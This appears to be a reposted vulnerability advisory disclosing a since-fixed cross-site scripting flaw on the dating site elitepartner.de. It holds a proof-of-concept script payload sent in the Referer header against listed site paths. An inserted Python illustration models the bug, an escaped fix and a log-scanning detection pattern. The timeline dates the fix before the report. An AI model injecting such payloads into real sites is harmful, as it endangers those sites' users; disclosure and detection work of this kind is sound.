ElitePartner.de Cross Site Scripting

2013-01-11T00:00:00
ID PACKETSTORM:119468
Type packetstorm
Reporter Stefan Schurtz
Modified 2013-01-11T00:00:00

Description

                                        
  
Advisory: www.elitepartner.de - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2012-024
Author: Stefan Schurtz
Affected Software: Successfully tested on www.elitepartner.de
Vendor URL: http://www.elitepartner.de
Vendor Status: fixed

==========================
Vulnerability Description
==========================

http://www.elitepartner.de is prone to a cross-site scripting (XSS) vulnerability

==========================
PoC-Exploit
==========================

http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/

Referer: '"></style></script><script>alert(/huh/)</script>
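Added illustration, not part of the advisory and not code from elitepartner.de: the Python below models the bug class behind a Referer-based XSS (a directory index or error page that echoes the Referer header into its HTML) next to the encoded version, and scans combined-format access log lines for Referer values that carry markup, which is what a defender would look for after such a report. The page paths and log lines are constructed; the only value taken from the advisory is its Referer payload.

```python
import html
import re

# Constructed model of the vulnerable pattern: an index/error page that writes the
# Referer request header into its HTML without encoding it.
def render_index_page_vulnerable(path: str, referer: str) -> str:
    return (f"<html><body><h1>Index of {path}</h1>"
            f"<p>You came from: {referer}</p></body></html>")

# Hardened form: HTML-encode every attacker-controlled value before it enters markup.
# quote=True also encodes ' and ", so the "break out of an attribute" prefix fails.
def render_index_page_safe(path: str, referer: str) -> str:
    return ("<html><body><h1>Index of {}</h1>"
            "<p>You came from: {}</p></body></html>").format(
                html.escape(path, quote=True), html.escape(referer, quote=True))

# Detection side: combined-format access log lines (Apache/nginx) keep the Referer
# in the second quoted field; the server escapes embedded quotes as \".
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'\S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>[^"]*)"$')
# Markup or script fragments have no business in a Referer; flag the common ones.
_SUSPICIOUS = re.compile(
    r'<\s*/?\s*(script|style|img|svg|iframe)\b|javascript:|\bon\w+\s*=', re.I)

def suspicious_referers(log_lines):
    """Return (client_ip, request_line, referer) for each line whose Referer has markup."""
    hits = []
    for line in log_lines:
        m = _COMBINED.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        ref = m.group("referer")
        if _SUSPICIOUS.search(ref):
            hits.append((m.group("ip"), m.group("req"), ref))
    return hits

# Constructed sample log: one benign request and one carrying the advisory's payload
# in the Referer, written the way a web server records it (embedded quote escaped).
SAMPLE_LOG = [
    r'203.0.113.7 - - [10/Jan/2013:12:00:01 +0100] "GET /km/gfx/ HTTP/1.1" 200 512 "http://www.example.org/" "Mozilla/5.0"',
    r'''203.0.113.9 - - [10/Jan/2013:12:00:02 +0100] "GET /km/static/js/ HTTP/1.1" 200 734 "'\"></style></script><script>alert(/huh/)</script>" "Mozilla/5.0"''',
]

if __name__ == "__main__":
    for ip, req, ref in suspicious_referers(SAMPLE_LOG):
        print(f"{ip} {req!r} referer={ref!r}")
```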
  
==========================
Solution
==========================

fixed

==========================
Disclosure Timeline
==========================

23-Dec-2012 - informed by contact form
10-Jan-2012 - fixed by developer

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt